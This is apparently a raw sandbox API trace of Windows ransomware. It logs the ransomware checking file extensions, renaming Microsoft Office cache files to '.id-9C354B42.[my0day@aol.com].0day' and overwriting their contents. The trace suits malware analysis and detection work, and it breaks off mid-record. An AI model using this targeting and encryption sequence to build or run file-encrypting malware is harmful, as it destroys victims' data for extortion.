[0039.530] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.530] lstrlenW (lpString=".zip") returned 4 [0039.530] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.530] lstrlenW (lpString=".rar") returned 4 [0039.530] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.530] lstrlenW (lpString=".bz2") returned 4 [0039.530] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.530] lstrlenW (lpString=".7z") returned 3 [0039.530] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.530] lstrlenW (lpString=".dbf") returned 4 [0039.530] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.530] lstrlenW (lpString=".1cd") returned 4 [0039.530] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.531] lstrlenW (lpString=".jpg") returned 4 [0039.531] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.531] lstrlenW (lpString=".doc") returned 4 [0039.531] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.531] lstrlenW (lpString=".docx") returned 5 [0039.531] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.531] lstrlenW (lpString=".pdf") returned 4 [0039.531] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.531] lstrlenW (lpString=".xls") returned 4 [0039.531] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.531] lstrlenW (lpString=".xlsx") returned 5 [0039.531] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.531] lstrlenW (lpString=".ppt") returned 4 [0039.531] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0039.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.531] lstrlenW (lpString=".zip") returned 4 [0039.531] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0039.531] lstrlenW (lpString=".rar") returned 4 [0039.531] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0039.531] lstrlenW (lpString=".bz2") returned 4 [0039.531] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0039.531] lstrlenW (lpString=".7z") returned 3 [0039.531] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0039.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.531] lstrlenW (lpString=".dbf") returned 4 [0039.531] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0039.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.531] lstrlenW (lpString=".1cd") returned 4 [0039.531] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0039.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.532] lstrlenW (lpString=".jpg") returned 4 [0039.532] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0039.532] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0039.532] lstrlenW (lpString="Proof.cab") returned 9 [0039.532] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0039.532] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=21064532) returned 1 [0039.532] CloseHandle (hObject=0x1a8) returned 1 [0039.532] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab")) returned 0x2020 [0039.532] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0039.532] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0039.533] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0039.533] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0x0) returned 1 [0039.533] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.533] ReadFile (in: hFile=0x1a8, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.613] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.613] ReadFile (in: hFile=0x1a8, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.617] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0039.617] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.617] ReadFile (in: hFile=0x1a8, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0039.635] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.636] WriteFile (in: hFile=0x1a8, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x370fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0039.650] SetEndOfFile (hFile=0x1a8) returned 1 [0039.651] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fca0b0 [0039.651] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.651] WriteFile (in: hFile=0x1a8, lpBuffer=0x3fca0b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b0*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.651] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x6b23c6, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.652] WriteFile (in: hFile=0x1a8, lpBuffer=0x3fca0b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b0*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.652] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x13d6b54, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.652] WriteFile (in: hFile=0x1a8, lpBuffer=0x3fca0b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b0*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.999] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fca0b0 | out: hHeap=0x5f0000) returned 1 [0040.002] CloseHandle (hObject=0x1a8) returned 1 [0042.382] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.382] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.382] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.382] lstrlenW (lpString=".doc") returned 4 [0042.382] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.382] lstrlenW (lpString=".docx") returned 5 [0042.382] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0042.382] lstrlenW (lpString=".pdf") returned 4 [0042.382] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.382] lstrlenW (lpString=".xls") returned 4 [0042.382] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.382] lstrlenW (lpString=".xlsx") returned 5 [0042.382] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0042.382] lstrlenW (lpString=".ppt") returned 4 [0042.382] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.382] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.382] lstrlenW (lpString=".zip") returned 4 [0042.382] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.382] lstrlenW (lpString=".rar") returned 4 [0042.382] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.382] lstrlenW (lpString=".bz2") returned 4 [0042.383] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.383] lstrlenW (lpString=".7z") returned 3 [0042.383] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.383] lstrlenW (lpString=".dbf") returned 4 [0042.383] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.383] lstrlenW (lpString=".1cd") returned 4 [0042.383] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.383] lstrlenW (lpString=".jpg") returned 4 [0042.383] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.383] lstrlenW (lpString=".doc") returned 4 [0042.383] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.383] lstrlenW (lpString=".docx") returned 5 [0042.383] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0042.383] lstrlenW (lpString=".pdf") returned 4 [0042.383] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.383] lstrlenW (lpString=".xls") returned 4 [0042.383] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.383] lstrlenW (lpString=".xlsx") returned 5 [0042.383] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0042.383] lstrlenW (lpString=".ppt") returned 4 [0042.383] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.383] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.383] lstrlenW (lpString=".zip") returned 4 [0042.383] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.383] lstrlenW (lpString=".rar") returned 4 [0042.383] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.383] lstrlenW (lpString=".bz2") returned 4 [0042.383] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.384] lstrlenW (lpString=".7z") returned 3 [0042.384] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.384] lstrlenW (lpString=".dbf") returned 4 [0042.384] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.384] lstrlenW (lpString=".1cd") returned 4 [0042.384] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.384] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 81 [0042.384] lstrlenW (lpString=".jpg") returned 4 [0042.384] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.384] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0042.384] lstrlenW (lpString="OneNoteMUI.msi") returned 14 [0042.384] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0042.387] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=2503680) returned 1 [0042.387] CloseHandle (hObject=0x1a8) returned 1 [0042.387] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi")) returned 0x2020 [0042.387] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.387] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0042.387] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0042.388] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0x0) returned 1 [0042.388] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.388] ReadFile (in: hFile=0x1a8, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.392] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.392] ReadFile (in: hFile=0x1a8, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.400] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.400] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.400] ReadFile (in: hFile=0x1a8, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.416] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.416] WriteFile (in: hFile=0x1a8, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x370fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0042.552] SetEndOfFile (hFile=0x1a8) returned 1 [0042.552] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fca0b8 [0042.552] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.552] WriteFile (in: hFile=0x1a8, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.554] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.554] WriteFile (in: hFile=0x1a8, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.560] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.560] WriteFile (in: hFile=0x1a8, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.562] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fca0b8 | out: hHeap=0x5f0000) returned 1 [0042.562] CloseHandle (hObject=0x1a8) returned 1 [0042.563] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.563] lstrlenW (lpString=".doc") returned 4 [0042.563] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.563] lstrlenW (lpString=".docx") returned 5 [0042.563] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.563] lstrlenW (lpString=".pdf") returned 4 [0042.563] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.563] lstrlenW (lpString=".xls") returned 4 [0042.563] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.563] lstrlenW (lpString=".xlsx") returned 5 [0042.563] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.563] lstrlenW (lpString=".ppt") returned 4 [0042.563] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.563] lstrlenW (lpString=".zip") returned 4 [0042.563] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.563] lstrlenW (lpString=".rar") returned 4 [0042.563] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.563] lstrlenW (lpString=".bz2") returned 4 [0042.563] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.563] lstrlenW (lpString=".7z") returned 3 [0042.563] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.563] lstrlenW (lpString=".dbf") returned 4 [0042.563] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.563] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.564] lstrlenW (lpString=".1cd") returned 4 [0042.564] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.564] lstrlenW (lpString=".jpg") returned 4 [0042.564] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.564] lstrlenW (lpString=".doc") returned 4 [0042.564] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.564] lstrlenW (lpString=".docx") returned 5 [0042.564] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0042.564] lstrlenW (lpString=".pdf") returned 4 [0042.564] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.564] lstrlenW (lpString=".xls") returned 4 [0042.564] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.564] lstrlenW (lpString=".xlsx") returned 5 [0042.564] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0042.564] lstrlenW (lpString=".ppt") returned 4 [0042.564] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.564] lstrlenW (lpString=".zip") returned 4 [0042.564] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.564] lstrlenW (lpString=".rar") returned 4 [0042.564] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.564] lstrlenW (lpString=".bz2") returned 4 [0042.564] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.564] lstrlenW (lpString=".7z") returned 3 [0042.564] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.564] lstrlenW (lpString=".dbf") returned 4 [0042.564] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.564] lstrlenW (lpString=".1cd") returned 4 [0042.565] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.565] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 77 [0042.565] lstrlenW (lpString=".jpg") returned 4 [0042.565] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.565] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0042.565] lstrlenW (lpString="GrooveLR.cab") returned 12 [0042.565] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0042.565] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=4095519) returned 1 [0042.565] CloseHandle (hObject=0x1a8) returned 1 [0042.565] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab")) returned 